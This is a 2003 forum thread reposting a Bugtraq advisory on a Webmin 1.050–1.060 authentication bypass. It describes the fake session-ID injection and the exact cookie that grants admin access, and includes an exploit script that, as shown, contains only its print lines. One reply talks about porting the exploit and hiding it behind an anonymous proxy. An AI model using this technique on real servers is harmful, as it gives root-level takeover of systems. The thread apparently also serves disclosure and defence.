Joined: 18 Apr 2002 Posts: 16777215 Location: Kuala Lumpur, Malaysia
Posted: Mon Feb 24, 2003 6:19 pm Post subject: Webmin 1.050 - 1.060 remote exploit - Dangerous
From Bugtraq today.
Attached is an exploit for the latest Webmin vulnerability. It relies on a
non-default setting (passdelay) to be enabled.
Webmin can verify user authentication by use of a session ID (SID) that is
assigned when a user successfully authenticates to Webmin. It is possible to
inject a fake SID into the session ID database by using a malicious username
containing control sequences used internally by Webmin.
This exploit simply creates a SID of 1234567890 for the user 'admin'. Then, it
is a simple case of creating a cookie in your favorite browser containing:
sid=1234567890; testing=1
Such that the Cookie HTTP header contains:
Cookie: sid=1234567890; testing=1
When the webmin server recieves this cookie, it is verified as an authentic
SID and an attacker can take complete control of the Webmin server... this is
basically root access to the box it is running on.
Cheers,
Carl
webmin-exploit.pl
Code:
#!/usr/bin/perl
#
# Exploit for Webmin 1.050 -> 1.060 by Carl Livitt
#
# Inserts a fake session_id into the sessions list of webmin.
# Does no error checking... if remote host is not found, no
# error will be reported.
#
print "Webmin 1.050 - 1.060 Remote SID Injection Exploit\n";
print "By Carl Livitt <carl at learningshophull dot co dot uk>\n\n";
print "You should now have a session_id of 1234567890 for user 'admin' on host $hostname.\n";
print "Just set two cookies in your browser:\n\ttesting=1\n\tsid=1234567890\nand you will ";
print "be authenticated to the webmin server!\n\n";
print "Note: This will only work on a webmin server configured with the 'passdelay' option.\n";
Joined: 17 Oct 2002 Posts: 16777178 Location: California
Posted: Wed Feb 26, 2003 4:44 am Post subject:
Damn, I can't believe what a geek I've become... I took one look at that source and thought how simple it would be to port that to PHP, dump the netcat (make it independent), add the ability to pipe it through an anonymous HTTP proxy and slap a web interface on it...
Joined: 27 May 2002 Posts: 16777215 Location: U.S.A.
Posted: Wed Feb 26, 2003 5:18 am Post subject:
Since this would really only be a threat from a inside source wouldn't a old rule of thumb resolve this? Kill all unused services. Then when needed restart the service and when done kill it. Problem solved? or am I missing something?
This is what I do with sshd due to outside access.
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum